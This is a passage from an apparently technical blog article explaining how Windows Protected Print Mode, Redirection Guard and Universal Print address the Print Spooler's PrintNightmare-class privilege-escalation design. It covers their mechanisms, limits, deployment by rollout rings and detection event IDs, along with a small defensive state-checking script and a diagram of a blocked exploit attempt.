&lt;p&gt;The second reason is the back-compat constraint from section 2.3. The third-party driver DLLs in the installed base are signed and packaged to expect LocalSystem context. They use Win32 APIs that a constrained token cannot call. They write to filesystem locations a constrained token cannot reach. They register printer ports through interfaces that a fully sandboxed spooler could not host. The cost of the constrained-token migration is not the cost of changing one Microsoft binary. It is the cost of breaking, in the worst case, every Windows-compatible printer manufactured before 2024.Microsoft has never published a statement that AppContainer was explicitly evaluated and rejected for &lt;code&gt;spoolsv.exe&lt;/code&gt;. The argument above is INFERRED from the absence of any constrained-token Spooler in any shipped Windows release, and from the MORSE blog&apos;s repeated framing of the third-party driver install base as the binding constraint [@ms-wpp-more-info]. The inference is well grounded but not directly stated.&lt;/p&gt;
&lt;h3&gt;5.2 PrintIsolationHost.exe as Partial Answer&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s first attempt to break the &quot;DLL loaded inside &lt;code&gt;spoolsv.exe&lt;/code&gt;&quot; conjunct shipped with Windows 7 and Windows Server 2008 R2 (October 22, 2009) [@ms-print-spooler-architecture] [@ms-previous-versions-server-2008-R2]. It was called Printer Driver Isolation. The mechanism: third-party driver code can run in a sibling process called &lt;code&gt;PrintIsolationHost.exe&lt;/code&gt;. The spooler talks to that process over IPC instead of loading the driver DLL into its own address space.&lt;/p&gt;

A sibling host process introduced in Windows 7 / Server 2008 R2 (October 22, 2009) that can load third-party printer driver code outside of `spoolsv.exe`. Drivers opt in via the `DriverIsolation` directive in their INF file: Microsoft&apos;s documentation enumerates two values, `2` (&quot;the driver supports driver isolation&quot;) and `0` (&quot;the driver does not support driver isolation&quot;; the same effect as omitting the keyword) [@ms-printer-driver-isolation]. By default, `PrintIsolationHost.exe` runs as LocalSystem [@ms-printer-driver-isolation] [@ms-print-spooler-architecture]. The isolation is process isolation, not privilege isolation.
&lt;p&gt;Three details matter for the section 5 argument. First, the isolation is process isolation, not privilege isolation: &lt;code&gt;PrintIsolationHost.exe&lt;/code&gt; itself runs as LocalSystem. A bug in &lt;code&gt;PrintIsolationHost.exe&lt;/code&gt; is still a SYSTEM bug, just in a different process. Second, the opt-in is the driver vendor&apos;s responsibility, set in the INF file&apos;s &lt;code&gt;DriverIsolation&lt;/code&gt; directive [@ms-printer-driver-isolation]. By default, if the INF does not opt in, the spooler loads the driver in-process. Third, and most importantly: &lt;code&gt;PrintIsolationHost.exe&lt;/code&gt; only hosts driver code at print time. It does not move the RPC server, the driver-installation flow (&lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; and &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt;), or the spool directory filesystem operations out of &lt;code&gt;spoolsv.exe&lt;/code&gt;. The PrintNightmare entry points are all in code paths Printer Driver Isolation does not touch.&lt;/p&gt;
&lt;p&gt;So Printer Driver Isolation existed for twelve years before PrintNightmare. It did not help. It addresses a different attack surface.&lt;/p&gt;
&lt;h3&gt;5.3 The MORSE Framing&lt;/h3&gt;
&lt;p&gt;In December 2023, the Microsoft Offensive Research and Security Engineering (MORSE) team and the Print team co-authored a Microsoft Security Blog post announcing what would become Windows Protected Print Mode. The blog and its companion Microsoft Learn pages contain two sentences that are load-bearing for the rest of this article.&lt;/p&gt;
&lt;p&gt;The first sentence sets the cadence empirically:&lt;/p&gt;

Print bugs accounted for 9% of all cases reported to the Microsoft Security Response Center (MSRC) over the past three years. -- Microsoft, December 2023 [@ms-wpp-more-info] [@ms-blog-secure-print-experience-4002645]
&lt;p&gt;The &quot;over the past three years&quot; qualifier matters. The 9% is a baseline measurement for 2020 through 2023, not a long-term steady-state rate. Without the qualifier, the number reads as a stable structural fact about Windows. With the qualifier, it reads as what it actually is: a measurement of the period during which the patch cascade documented in section 4 was running.&lt;/p&gt;
&lt;p&gt;The second sentence is more consequential. Microsoft, in its own voice, names the architectural answer:&lt;/p&gt;

The ideal solution would be to remove drivers entirely and move the Spooler to a least privilege security model. -- Microsoft, MORSE / Print team [@ms-wpp-more-info]
&lt;p&gt;Read that sentence in the context of the section 4 patch cascade. Microsoft is saying that the architectural answer to the bug class is not a better authorization check, not a tighter Point and Print policy, not a more aggressive default flip. It is to remove third-party drivers entirely and to move the spooler off LocalSystem. The enterprise version of the same document spells out the coverage expectation:&lt;/p&gt;

Windows protected print mode would mitigate over half of past reported security issues for Windows print. -- Microsoft, Windows Protected Print Mode for Enterprises [@ms-wpp-enterprises]
&lt;p&gt;&quot;Past reported security issues for Windows print&quot; is a class. &quot;Would mitigate over half&quot; is a coverage statement at the class level, not at the bug level. WPP is a class mitigation; it is the architectural answer the patch cascade could not produce.&lt;/p&gt;
&lt;h3&gt;5.4 The Forced Parallel-Stack Answer&lt;/h3&gt;
&lt;p&gt;Here is where the argument turns. Microsoft did not ship one architectural answer. It shipped two. The reason is that neither one alone covers the back-compat envelope.&lt;/p&gt;
&lt;p&gt;Universal Print is the cloud-hosted answer. It removes the local print queue, removes the local SYSTEM-context Spooler from the workflow entirely, and centralizes the print fan-out in Microsoft 365 [@ms-universal-print-whatis]. On a Universal-Print-only endpoint with the local Spooler service disabled, there is no &lt;code&gt;\PIPE\spoolss&lt;/code&gt; exposed to a low-privilege user. The architectural primitive&apos;s conjunct (a) -- the low-privilege RPC entry -- simply does not exist on that host.&lt;/p&gt;
&lt;p&gt;Windows Protected Print Mode is the local-stack answer. It keeps the local Spooler service but restructures it: most operations are deferred to a Spooler Worker process with a restricted token, and the spooler refuses to load any driver DLL that is not Microsoft-signed [@ms-wpp-more-info] [@ms-wpp-canonical]. The architectural primitive&apos;s conjuncts (b) (caller-influenced DLL load) and partially (c) (SYSTEM context, for per-user operations) are broken.&lt;/p&gt;
&lt;p&gt;Neither answer covers the union of constraints that a real Windows fleet faces. Universal Print requires cloud connectivity, Microsoft 365 / Entra ID licensing, and per-printer service costs. It does not work offline. It does not work for specialty printers (industrial label printers, healthcare imaging printers, secure check printers) that have no IPP-class-compatible firmware. WPP requires Mopria-certified printers or the small set of Microsoft-signed drivers that ship inbox. It does not work for the same specialty-printer category. The two answers cover different threat models, different licensing models, and different operational realities.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Windows Protected Print Mode and Universal Print are not redundant. They break different conjuncts of the architectural primitive, and together they cover what neither covers alone. The 2024 Windows print stack is a deliberate parallel architecture, not a transition state.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The WPP FAQ confirms the parallel-stack reading. When asked &quot;Will Windows protected print mode ever be enabled by default?&quot; the page answers verbatim: &quot;Windows protected print mode will be enabled by default at a future date&quot; [@ms-wpp-faq].The &quot;future date&quot; phrasing in the WPP FAQ is preserved verbatim because it carries the entire commitment. Microsoft has published deprecation milestones for third-party drivers (January 15, 2026; July 1, 2026; July 1, 2027) [@ms-end-of-servicing], but it has not committed to a date for WPP-on-by-default. As of June 2026, &quot;at a future date&quot; is still the only formal commitment.&lt;/p&gt;
&lt;h3&gt;5.5 The Conjunct Framing as Lead-in to Section 8&lt;/h3&gt;
&lt;p&gt;We can state the architectural argument compactly now and we will return to it formally in section 8. The architectural primitive has three conjuncts. (a) The service accepts low-privilege RPC. (b) It loads caller-influenced third-party DLLs. (c) It runs at SYSTEM. Any service of that shape produces a SYSTEM-execution primitive by construction. Microsoft&apos;s three shipped approaches each break exactly one conjunct:&lt;/p&gt;

flowchart LR
    PRIM[&quot;Architectural primitive&lt;br /&gt;(a) low-priv RPC entry&lt;br /&gt;(b) caller-influenced DLL load&lt;br /&gt;(c) SYSTEM context&quot;]
    EXITA[&quot;Break (a) low-priv RPC entry&quot;]
    EXITB[&quot;Break (b) caller-influenced DLL load&quot;]
    EXITC[&quot;Break (c) SYSTEM context&quot;]
    PRIM --&amp;gt; EXITA
    PRIM --&amp;gt; EXITB
    PRIM --&amp;gt; EXITC
    EXITA --&amp;gt; UP[&quot;Universal Print (2021)&lt;br /&gt;no local pipe spoolss&quot;]
    EXITA --&amp;gt; CERT[&quot;Stop Spooler service&lt;br /&gt;(CERT/CC 2021)&quot;]
    EXITB --&amp;gt; WPPMOD[&quot;WPP module blocking (2024)&lt;br /&gt;only Microsoft-signed drivers&quot;]
    EXITC --&amp;gt; PIH[&quot;PrintIsolationHost (2009)&lt;br /&gt;partial: still LocalSystem&quot;]
    EXITC --&amp;gt; WPPWORKER[&quot;WPP Spooler Worker (2024)&lt;br /&gt;restricted token, below SYSTEM IL&quot;]
&lt;p&gt;The remaining sections are about the design space Microsoft chose to occupy in 2024, why it occupies two points rather than one, and what is still missing in 2026 -- including, candidly, a satisfying answer for environments that cannot adopt either architectural exit.&lt;/p&gt;
&lt;h2&gt;6. State of the Art: Windows Protected Print Mode in 24H2&lt;/h2&gt;
&lt;p&gt;Windows Protected Print Mode shipped to Windows 11 24H2 on October 1, 2024 as an opt-in feature [@computerweekly-quocirca-wpp] [@ms-wpp-canonical]. As of June 2026 it is still opt-in. The WPP FAQ uses the verbatim phrase &quot;at a future date&quot; for when the default-on flip will happen [@ms-wpp-faq]. No date has been committed.&lt;/p&gt;

An opt-in Windows print stack introduced with Windows 11 24H2 (October 1, 2024) that exclusively uses the modern print stack, blocks all third-party printer drivers, runs normal spooler operations in a Spooler Worker process with a restricted token below SYSTEM integrity, and falls back to the inbox Microsoft IPP Class Driver for printer communication [@ms-wpp-canonical] [@ms-wpp-more-info]. Activation is by Group Policy (&quot;Configure Windows protected print&quot;), Intune (`./Device/Vendor/MSFT/Policy/Config/Printers/ConfigureWindowsProtectedPrint` via the Policy CSP for Printers [@ms-policy-csp-printers]), or registry [@ms-wpp-enterprises].
&lt;h3&gt;6.1 What WPP Changes&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s MORSE / Print team blog enumerates six concurrent changes [@ms-wpp-more-info]. Each one is interesting on its own; together they constitute the architectural exit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Spooler Worker process with restricted token.&lt;/strong&gt; Normal &lt;code&gt;spoolsv.exe&lt;/code&gt; operations are deferred to a new Spooler Worker process. The worker runs with a restricted token that drops &lt;code&gt;SeTcbPrivilege&lt;/code&gt; and &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; and runs below SYSTEM integrity level. This is the operational form of &quot;move the Spooler to a least privilege security model&quot; from the MORSE quote.&lt;/p&gt;

The new Spooler Worker process has a new restricted token that removes many privileges such as SeTcbPrivilege, SeAssignPrimaryTokenPrivilege, and no longer runs at SYSTEM IL. -- Microsoft Learn, More information on Windows Protected Print Mode [@ms-wpp-more-info]
&lt;p&gt;That sentence, taken verbatim from Microsoft&apos;s own architecture documentation [@ms-wpp-more-info] [@ms-wpp-more-info-wayback], is the most concrete claim Microsoft has shipped about how WPP breaks conjunct (c). Two privileges enumerated, one integrity level reduced. The legacy &lt;code&gt;spoolsv.exe&lt;/code&gt; process is still SYSTEM; the &lt;em&gt;worker&lt;/em&gt; that does the per-job work is not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module blocking.&lt;/strong&gt; APIs that previously allowed third-party module loading (&lt;code&gt;AddPrintProviderW&lt;/code&gt; and similar) are gated by a module-blocking policy. The MORSE document states the new policy verbatim: &quot;only Microsoft Signed binaries required for IPP are loaded&quot; [@ms-wpp-more-info].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;XPS rendering per-user.&lt;/strong&gt; XPS rendering, historically a source of memory-corruption bugs in &lt;code&gt;PrintFilterPipelineSvc&lt;/code&gt;, runs per-user instead of as SYSTEM. A memory-corruption bug in the XPS parser now compromises a user, not the machine.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Process hardening on the Spooler Worker.&lt;/strong&gt; The Spooler Worker process is built with &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Control Flow Guard&lt;/a&gt;, Control Flow Enforcement Technology (Intel CET shadow stack), Arbitrary Code Guard, Child Process Creation Disabled, and Redirection Guard enabled [@ms-wpp-more-info] [@msrc-redirectionguard-blog]. The MORSE blog explicitly says why the legacy spooler could not enable these mitigations: &quot;many print drivers are decades old and are incompatible with modern security mitigations&quot; [@ms-wpp-more-info].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Point and Print restricted.&lt;/strong&gt; Point and Print can configure an IPP printer but cannot install a third-party driver. The MORSE document is verbatim: &quot;Windows protected print mode prevents Point and Print from ever installing third-party drivers&quot; [@ms-wpp-more-info]. That sentence is the architectural answer to the Generation 3 patch wave from section 4.3.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fallback to inbox IPP class driver.&lt;/strong&gt; Printing falls back to the Microsoft IPP Class Driver that ships with Windows. The driver works with Mopria-certified printers and with the Microsoft-signed driver subset [@mopria-certified-products] [@ms-modern-print-platform].&lt;/p&gt;
&lt;h3&gt;6.2 Mapping WPP to the Three Conjuncts&lt;/h3&gt;
&lt;p&gt;WPP breaks conjunct (b) by refusing to load anything that is not Microsoft-signed. It weakens conjunct (c) by moving the bulk of operations into a Spooler Worker with a restricted token below SYSTEM integrity. The low-privilege RPC entry (conjunct a) is preserved by design: the RPC interface still exists, clients still talk to it, but what they can ask the service to do is reduced.&lt;/p&gt;
&lt;p&gt;That last asymmetry matters. WPP does not delete the &lt;code&gt;\PIPE\spoolss&lt;/code&gt; endpoint. A WPP-enabled host still answers &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; calls; it just refuses to load an unsigned driver in response. Detection rules that watched for the RPC call itself (the SigmaHQ Zeek-on-the-wire rule, for instance [@sigma-cve-2021-1675-zeek]) still see traffic on WPP hosts; rules that watched for the resulting unsigned DLL load (the SigmaHQ image-load rule [@sigma-cve-2021-1675-win-spooler]) should see audit events instead.&lt;/p&gt;
&lt;h3&gt;6.3 The Compatibility Envelope&lt;/h3&gt;
&lt;p&gt;WPP requires either a printer that the inbox IPP class driver can drive (a Mopria-certified printer in practice) or one of the small set of Microsoft-signed drivers. The Mopria Alliance certified-products directory lists a multi-vendor catalog of printers across Brother, Canon, HP, Epson, Lexmark, Xerox, and others [@mopria-certified-products]. The installed base of Mopria-certified printers is large.The Mopria Alliance does not publish a single official total install-base count. The certified-products directory is the canonical inventory [@mopria-certified-products], and the industry-analyst framing in the December 2023 MORSE blog points to a multi-vendor catalog &quot;covering many of the most common printer brands sold worldwide&quot; [@ms-blog-secure-print-experience-4002645]. We report the order of magnitude (industry-wide) rather than a brittle exact count.&lt;/p&gt;
&lt;p&gt;Printers that require vendor-specific v3 drivers are not WPP-compatible by default. Industrial label printers (Zebra, Honeywell, SATO, TSC, Dymo) are the painful case. Their command languages (ZPL, EPL) are not part of the IPP class driver&apos;s repertoire [@ezeep-label-printers-wpp]. ezeep&apos;s June 2026 writeup is blunt: &quot;Most thermal label printers... are not Mopria-certified, so they stop working when Windows Protected Print Mode is enforced. ZPL and EPL are not part of the IPP spec the IPP class driver speaks&quot; [@ezeep-label-printers-wpp]. Three paths are open: keep WPP disabled on label workstations via GPO, refresh hardware to IPP-capable models, or use a cloud-rendered alternative.&lt;/p&gt;
&lt;p&gt;Vendors that want WPP compatibility without a full IPP firmware conversion can ship Print Support Apps. Brother is one of the first vendors to publish a PSA [@brother-print-support-app]. Lexmark&apos;s vendor primary on the WPP transition documents the same path [@lexmark-wpp-support].&lt;/p&gt;

The Microsoft-supplied inbox driver that uses the Internet Printing Protocol (IPP) to communicate with printers that implement the Mopria-Alliance-certified IPP everywhere subset. WPP-enforced clients use this driver instead of a vendor-specific driver. Printers must be Mopria-certified (or implement Mopria-compatible IPP) for the inbox driver to drive them [@mopria-certified-products] [@ms-modern-print-platform].

The two pre-WPP Windows printer driver packaging models. v3 (Windows 2000 era) loads driver render code into the spooler process by default. v4 (Windows 8 era) is XPS-based, packaged for portability across architectures, and has a more limited print processor model. WPP deprecates both in favor of the inbox IPP class driver (or, transitionally, vendor Print Support Apps) [@ms-print-spooler-architecture] [@ms-end-of-servicing].
&lt;h3&gt;6.4 Deployment Surfaces and Detection Signals&lt;/h3&gt;
&lt;p&gt;WPP&apos;s enable / disable control is a binary two-state CSP. The Policy CSP page documents &lt;code&gt;Printers/ConfigureWindowsProtectedPrint&lt;/code&gt; as accepting &lt;code&gt;0&lt;/code&gt; (disabled, the 2026 default) or &lt;code&gt;1&lt;/code&gt; (enabled), with no audit / monitor intermediate enum [@ms-policy-csp-printers]. The corresponding Group Policy path is &quot;Computer Configuration &amp;gt; Administrative Templates &amp;gt; Printers &amp;gt; Configure Windows protected print&quot; [@ms-wpp-enterprises]. CIS Benchmarks v5.0.1 (Windows 11) and v1.0.0 (Server 2025) treat the setting as a Level-2 hardening recommendation with the same binary registry value [@tenable-cis-w11-l2] [@tenable-cis-server-2025-l2].&lt;/p&gt;
&lt;p&gt;This is an important correction to a piece of folk wisdom about WPP. The Windows kernel and AppLocker have audit / enforce modes; AppControl for Business has audit / enforce modes; AMSI has logging tiers. WPP does not. Microsoft did not ship an &quot;audit&quot; enum on &lt;code&gt;ConfigureWindowsProtectedPrint&lt;/code&gt;. Administrators who want pre-enforcement telemetry have to instrument it themselves, either by reading the existing &lt;code&gt;Microsoft-Windows-PrintService/Admin&lt;/code&gt; event log (which carries Point and Print failures and module-load refusals regardless of whether WPP is on) or by deploying WPP to a pilot ring and watching the same log on those pilot machines. The deployment pattern is rollout rings, not an in-product audit mode.&lt;/p&gt;
&lt;p&gt;Because there is no in-product audit mode, the pre-enforcement signal is the existing print-services event log. The &lt;code&gt;Microsoft-Windows-PrintService/Admin&lt;/code&gt; channel records driver-load failures, Point and Print restrictions, and plug-in load failures. Splunk Research&apos;s &lt;code&gt;spoolsv.exe&lt;/code&gt; rule pack covers PrintService Admin Event ID 808 (plug-in load failure) paired with security log Event ID 4909 [@splunk-research-spoolsv-plugin-fail], and Event ID 316 for driver-add operations [@splunk-printnightmare-story] [@splunk-research-printnightmare-driver]. Redirection Guard mitigation events land in &lt;code&gt;Microsoft-Windows-Security-Mitigations/Operational&lt;/code&gt; [@msrc-redirectionguard-blog]. The diagnostic Event ID 4098 (in the Application log) is the workhorse signal for Point and Print restrictions and predates WPP [@ms-event-ids-point-print].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;ConfigureWindowsProtectedPrint&lt;/code&gt; CSP has two states: &lt;code&gt;0&lt;/code&gt; (disabled) and &lt;code&gt;1&lt;/code&gt; (enabled). There is no in-product audit / monitor mode. The right deployment pattern is rings: pilot, broad-pilot, production. Pilot a small ring of representative endpoints with WPP enforced and watch &lt;code&gt;Microsoft-Windows-PrintService/Admin&lt;/code&gt; events 316, 808, and 4098 for failed driver loads and Point and Print restrictions. Identify the printers that would fail. Decide between a fleet hardware refresh, a transitional Print Support App, or an exclusion list. Then expand the ring.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The probe below models a WPP-state PowerShell script in JavaScript for the runtime. It pretends the four signals (WPP policy state, Redirection Guard, recent PrintService Admin events, IPP class driver availability) are already retrieved; in production the values come from the Group Policy resultant set, &lt;code&gt;Get-ProcessMitigation&lt;/code&gt;, &lt;code&gt;Get-WinEvent&lt;/code&gt;, and &lt;code&gt;Get-PrinterDriver&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;{`
// Original PowerShell equivalents:
//   $wppPolicy = (Get-ItemProperty &apos;HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers&apos;)
//                .ConfigureWindowsProtectedPrint  # 0 = disabled, 1 = enabled
//   $rg        = (Get-ProcessMitigation -Name spoolsv.exe).RedirectionTrust
//   $events    = Get-WinEvent -LogName &apos;Microsoft-Windows-PrintService/Admin&apos; &lt;br /&gt;//                  -MaxEvents 200 | Where-Object { $&lt;em&gt;.Id -in 316,808,4098 -and &lt;br /&gt;//                  $&lt;/em&gt;.TimeCreated -ge (Get-Date).AddDays(-7) }
//   $ipp       = (Get-PrinterDriver -Name &apos;Microsoft IPP Class Driver&apos;) -ne $null&lt;/p&gt;
&lt;p&gt;const state = {
  wppPolicy: 0,                   // 0 = disabled, 1 = enabled (binary CSP)
  redirectionGuard: &apos;Enabled&apos;,    // &apos;Disabled&apos; | &apos;Audit&apos; | &apos;Enabled&apos;
  recentPrintServiceFailures: 14, // count of EventID 316/808/4098 in last 7d
  inboxIppDriverPresent: true,
  deploymentRing: &apos;pilot&apos;         // &apos;pilot&apos; | &apos;broad-pilot&apos; | &apos;production&apos;
};&lt;/p&gt;
&lt;p&gt;function classify(s) {
  if (s.wppPolicy === 0) {
    return s.deploymentRing === &apos;pilot&apos;
      ? &apos;NotProtected: enable WPP on pilot ring and monitor PrintService/Admin&apos;
      : &apos;NotProtected: WPP is disabled in ring &apos; + s.deploymentRing;
  }
  // wppPolicy === 1 means enforced; there is no audit/monitor intermediate
  const supportingMitigations =
    s.redirectionGuard === &apos;Enabled&apos; &amp;amp;&amp;amp; s.inboxIppDriverPresent;
  if (s.recentPrintServiceFailures &amp;gt; 0) {
    return &apos;Enforced: &apos; + s.recentPrintServiceFailures
      + &apos; PrintService/Admin failures in 7d. Investigate before expanding ring.&apos;;
  }
  return supportingMitigations
    ? &apos;Protected: WPP enforced, Redirection Guard on, IPP driver present&apos;
    : &apos;Enforced: review Redirection Guard / IPP driver gaps&apos;;
}&lt;/p&gt;
&lt;p&gt;console.log(classify(state));
`}&lt;/p&gt;
&lt;h3&gt;6.5 Redirection Guard&lt;/h3&gt;
&lt;p&gt;Redirection Guard is an independent process mitigation that ships separately from WPP but composes with it. It first arrived in Windows 11 22H2 in late 2023 and was the subject of a June 2025 MSRC blog post that documents its design [@msrc-redirectionguard-blog]. The mitigation is documented in the &lt;code&gt;PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY&lt;/code&gt; Win32 API structure [@ms-redirection-trust-policy] and is invoked through &lt;code&gt;Set-ProcessMitigation -Name spoolsv.exe -Enable RedirectionGuard&lt;/code&gt; [@ms-set-processmitigation].&lt;/p&gt;
&lt;p&gt;The mechanism: a process opted into Redirection Guard refuses to follow filesystem junctions or symbolic links created by non-administrator users. The MSRC blog frames the scope plainly: &quot;Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system&quot; [@msrc-redirectionguard-blog]. The Risky Business bulletin on the launch documents the empirical impact: of forty-two filesystem-path-redirection CVEs Microsoft patched in 2024, thirty-two used attacker-created junctions and could have been blocked by Redirection Guard had it been in place [@risky-biz-redirectionguard].&lt;/p&gt;
&lt;p&gt;Redirection Guard is the closest thing to a post-SpoolFool architectural fix in the legacy stack. WPP composes with it; a WPP-enabled host has both Redirection Guard on the legacy &lt;code&gt;spoolsv.exe&lt;/code&gt; process and the additional CFG / CET / ACG / Child Process Creation Disabled / Redirection Guard set on the Spooler Worker [@ms-wpp-more-info].&lt;/p&gt;
&lt;h3&gt;6.6 A Failed PrintNightmare Attempt Against a WPP-Enabled Host&lt;/h3&gt;
&lt;p&gt;The sequence below shows what happens when a low-privilege user attempts the Generation 1 PrintNightmare exploit against a WPP-enabled host. The RPC entry point is still answered; the module load is refused; the audit log captures the attempt; the elevation does not happen.&lt;/p&gt;

sequenceDiagram
    participant U as Low-priv user
    participant P as PIPE spoolss endpoint
    participant S as spoolsv.exe (parent)
    participant W as Spooler Worker (restricted token)
    participant L as Module loader
    participant V as Signature check
    participant E as PrintService Admin log
    U-&amp;gt;&amp;gt;P: RpcAddPrinterDriverEx (unsigned DLL)
    P-&amp;gt;&amp;gt;S: dispatch RPC call
    S-&amp;gt;&amp;gt;W: forward driver-install to worker
    W-&amp;gt;&amp;gt;L: load requested driver DLL
    L-&amp;gt;&amp;gt;V: verify signature
    V--&amp;gt;&amp;gt;L: reject (not Microsoft-signed)
    L--&amp;gt;&amp;gt;W: load refused
    W-&amp;gt;&amp;gt;E: write audit event 4098 (Point and Print failure)
    W--&amp;gt;&amp;gt;S: return access-denied
    S--&amp;gt;&amp;gt;U: STATUS_ACCESS_DENIED
    Note over U,W: No code runs as SYSTEM. Defender sees attempt in PrintService Admin.
&lt;p&gt;WPP is a partial answer that covers a large fraction of the threat model and a smaller fraction of the printer install base. The size of that smaller fraction -- specialty printers without IPP-class compatibility -- is the largest open practical problem in 2026 Print Spooler security.&lt;/p&gt;
&lt;h2&gt;7. Competing Answers: Universal Print versus Windows Protected Print Mode&lt;/h2&gt;
&lt;p&gt;Microsoft did not ship one architectural answer to Print Spooler. It shipped two. They are not redundant. They cover different threat models and different operational realities, and they are designed to coexist.&lt;/p&gt;
&lt;h3&gt;7.1 Universal Print at One Glance&lt;/h3&gt;
&lt;p&gt;Universal Print became generally available on March 2, 2021 [@ms-365-blog-universal-print-2212333] [@ms-universal-print-fundamentals].The exact March 2, 2021 GA date is industry knowledge anchored to Microsoft Ignite Spring 2021. The contemporaneous Microsoft 365 blog post [@ms-365-blog-universal-print-2212333] covers the wave but does not contain the verbatim date string. The Microsoft Learn fundamentals page documents the program&apos;s original &lt;code&gt;ms.date&lt;/code&gt; of March 2, 2020 (one year before GA) [@ms-universal-print-fundamentals]. We cite both because each one supports a different facet of the same date. The service moves the print queue to Microsoft 365 / Entra ID, removes the on-premises print server entirely, and removes the need for client-side third-party drivers. An optional on-prem connector lets the cloud service drive printers that are not directly cloud-aware [@ms-universal-print-whatis].&lt;/p&gt;

Microsoft&apos;s cloud-hosted print service. Universal Print eliminates print servers like OneDrive eliminates file servers [@ms-universal-print-whatis]. The architectural exit it takes is breaking conjunct (a): a Universal-Print-only endpoint with the local Spooler service disabled has no `\PIPE\spoolss` exposed to a low-privilege user. Universal Print became generally available on March 2, 2021 [@ms-365-blog-universal-print-2212333] and reached GCC / GCC High in October 2023 [@ms-universal-print-government].
&lt;p&gt;The architectural exit it takes is the one section 5 labelled (a): there is no &lt;code&gt;\PIPE\spoolss&lt;/code&gt; endpoint exposed on a Universal-Print-only host. The endpoint is a Microsoft 365 service called MPSIPPService that runs at &lt;code&gt;https://print.print.microsoft.com/&lt;/code&gt; [@ms-universal-print-getting-started]. Authentication is Entra ID OAuth2 / OIDC [@ms-universal-print-getting-started]. The threat model it removes is the local SMB-reachable low-privilege caller; the threat model it introduces is the cloud-account compromise.&lt;/p&gt;
&lt;h3&gt;7.2 The Cost of Universal Print&lt;/h3&gt;
&lt;p&gt;Universal Print is not free. It requires a Microsoft 365 / Entra ID license that includes the Universal Print entitlement. It requires network connectivity to print (the optional on-prem connector mitigates this for cached jobs; pure offline printing without the connector is not supported) [@ms-universal-print-getting-started]. It is per-user / per-printer in cost. The compatibility envelope is the IPP class driver plus the connector&apos;s translation surface; vendor-specific drivers are not part of the cloud service.&lt;/p&gt;
&lt;p&gt;Universal Print is available in commercial Microsoft 365 tenants and, as of October 2, 2023, in the GCC and GCC High government clouds. The fundamentals page records &quot;Universal Print is FedRamp certified by Office 365 and is now available in GCC, GCC High, and DoD environments&quot; [@ms-universal-print-government].&lt;/p&gt;
&lt;p&gt;The threat model Universal Print does not cover: an attacker who can reach Microsoft 365 / Entra ID tokens has cloud-side access, not local-spooler access. The PrintNightmare-class attack is moved off the endpoint; a different attack class (cloud-token compromise, mailbox compromise, OAuth phishing) takes its place. Universal Print does not, on its own, harden the surface; it relocates the surface to a cloud the customer outsources.&lt;/p&gt;
&lt;h3&gt;7.3 Head-to-Head&lt;/h3&gt;
&lt;p&gt;The trade-offs are easiest to compare in scannable form:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Universal Print&lt;/th&gt;
&lt;th&gt;Windows Protected Print Mode&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Architectural exit&lt;/td&gt;
&lt;td&gt;Breaks conjunct (a): no local pipe spoolss&lt;/td&gt;
&lt;td&gt;Breaks (b) and partially (c): no third-party drivers, Spooler Worker below SYSTEM IL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment model&lt;/td&gt;
&lt;td&gt;Cloud-hosted M365 service; optional on-prem connector&lt;/td&gt;
&lt;td&gt;Local Windows feature, GPO / Intune toggle&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Driver requirement&lt;/td&gt;
&lt;td&gt;None on client; connector translates server-side&lt;/td&gt;
&lt;td&gt;Microsoft IPP class driver or Microsoft-signed driver; Print Support Apps as transitional&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Offline support&lt;/td&gt;
&lt;td&gt;None native; on-prem connector required&lt;/td&gt;
&lt;td&gt;Yes (local printing continues)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License requirement&lt;/td&gt;
&lt;td&gt;M365 / Entra ID with Universal Print entitlement&lt;/td&gt;
&lt;td&gt;None beyond Windows 11 24H2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat model covered&lt;/td&gt;
&lt;td&gt;Removes the architectural primitive from the local host&lt;/td&gt;
&lt;td&gt;Removes third-party-driver and SYSTEM-context surfaces&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat model NOT covered&lt;/td&gt;
&lt;td&gt;Cloud-side token / account compromise&lt;/td&gt;
&lt;td&gt;The RPC entry point still exists; specialty printers still require legacy stack&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default state in 2026&lt;/td&gt;
&lt;td&gt;Opt-in (license-gated)&lt;/td&gt;
&lt;td&gt;Opt-in (Group Policy off by default)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
